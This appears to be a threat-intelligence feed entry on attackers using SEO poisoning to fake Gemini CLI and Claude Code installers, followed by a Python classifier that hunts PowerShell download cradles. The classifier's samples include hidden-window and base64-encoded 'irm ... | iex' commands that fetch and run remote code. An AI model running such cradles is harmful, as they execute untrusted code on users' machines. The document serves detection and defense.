Hackers Use SEO Poisoning to Fake Gemini CLI, Claude Installers
ID: 7f9ea9ec-5d5b-53ae-8ae8-5cc43709a8ef
STIX ID: report--7f9ea9ec-5d5b-53ae-8ae8-5cc43709a8ef
Feed Name: GBHackers
Financially motivated actors are impersonating popular AI developer tools (Gemini CLI and Claude Code) using SEO poisoning, typosquatted domains, and paid Google Ads to trick developers into pasting a single PowerShell command. That command executes a dual-stage, fileless PowerShell infostealer that disables ETW, bypasses AMSI, performs anti-sandbox checks, and harvests browser credentials, session tokens (which let the attacker bypass MFA), SSH keys, CI/CD credentials and cloud-synced data from victims across multiple sectors and regions. The report includes numerous IOCs (domains, an IP, and payload hosts), detection/hunting guidance (hunt for irm | iex download cradles and hidden-window PowerShell invocations), and recommended mitigations such as PowerShell constrained language mode, WDAC/AppLocker, FIDO2 enforcement, and developer training against paste-and-execute prompts.
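As an added example (not part of the feed post or the underlying GBHackers report), the hunting guidance above turned into a small Python classifier run over constructed Windows process-creation command lines. The example.invalid host, the sample command lines and the -EncodedCommand rescan are assumptions for illustration, not IOCs or behaviour taken from the report.

```python
import base64
import re

# Web fetch piped into, or wrapped by, Invoke-Expression: the "irm | iex" cradle.
_FETCH = r"(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)"
_EXEC = r"(?:iex|invoke-expression)"
CRADLE_RE = re.compile(
    rf"\b{_FETCH}\b[^|]*\|\s*{_EXEC}\b|\b{_EXEC}\b\s*\(?\s*{_FETCH}\b", re.IGNORECASE)


def _is_prefix(token, full):
    """powershell.exe accepts any prefix of a switch or value: -w h means -WindowStyle Hidden."""
    t = token.lower()
    return 0 < len(t) <= len(full) and full.startswith(t)


def classify_powershell_cmdline(cmdline):
    """Return the set of hunting tags that fire on one process-creation command line."""
    tags = set()
    if CRADLE_RE.search(cmdline):
        tags.add("cradle")
    tokens = cmdline.split()
    for i, tok in enumerate(tokens):
        if not tok.startswith("-"):
            continue
        name, nxt = tok.lstrip("-"), (tokens[i + 1] if i + 1 < len(tokens) else "")
        if _is_prefix(name, "windowstyle") and _is_prefix(nxt, "hidden"):
            tags.add("hidden_window")
        elif _is_prefix(name, "encodedcommand") and nxt:
            # -EncodedCommand carries the script as base64 of UTF-16LE; decode and rescan,
            # otherwise a cradle inside it never shows up in a plain string match.
            tags.add("encoded_command")
            try:
                script = base64.b64decode(nxt, validate=True).decode("utf-16le")
            except (ValueError, UnicodeDecodeError):
                script = ""
            if CRADLE_RE.search(script):
                tags.add("cradle")
    return tags


# Constructed sample command lines (e.g. from Sysmon event 1 or 4688); example.invalid is
# a placeholder host, not an indicator from the report.
_ENCODED = base64.b64encode("iex (irm https://example.invalid/a)".encode("utf-16le")).decode()
SAMPLE_CMDLINES = [
    'powershell.exe -w hidden -nop -c "irm https://example.invalid/setup.ps1 | iex"',
    r"powershell.exe -ExecutionPolicy Bypass -File C:\build\deploy.ps1",
    f"powershell -EncodedCommand {_ENCODED}",
    "pwsh -WindowStyle Hidden -c Get-Date",
]

if __name__ == "__main__":
    for cmdline in SAMPLE_CMDLINES:
        print(sorted(classify_powershell_cmdline(cmdline)), cmdline[:70])
```

The second sample (an unhidden, non-encoded script run) fires nothing, which is the point: the tags key on the cradle and the hidden or encoded invocation, not on PowerShell use as such.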
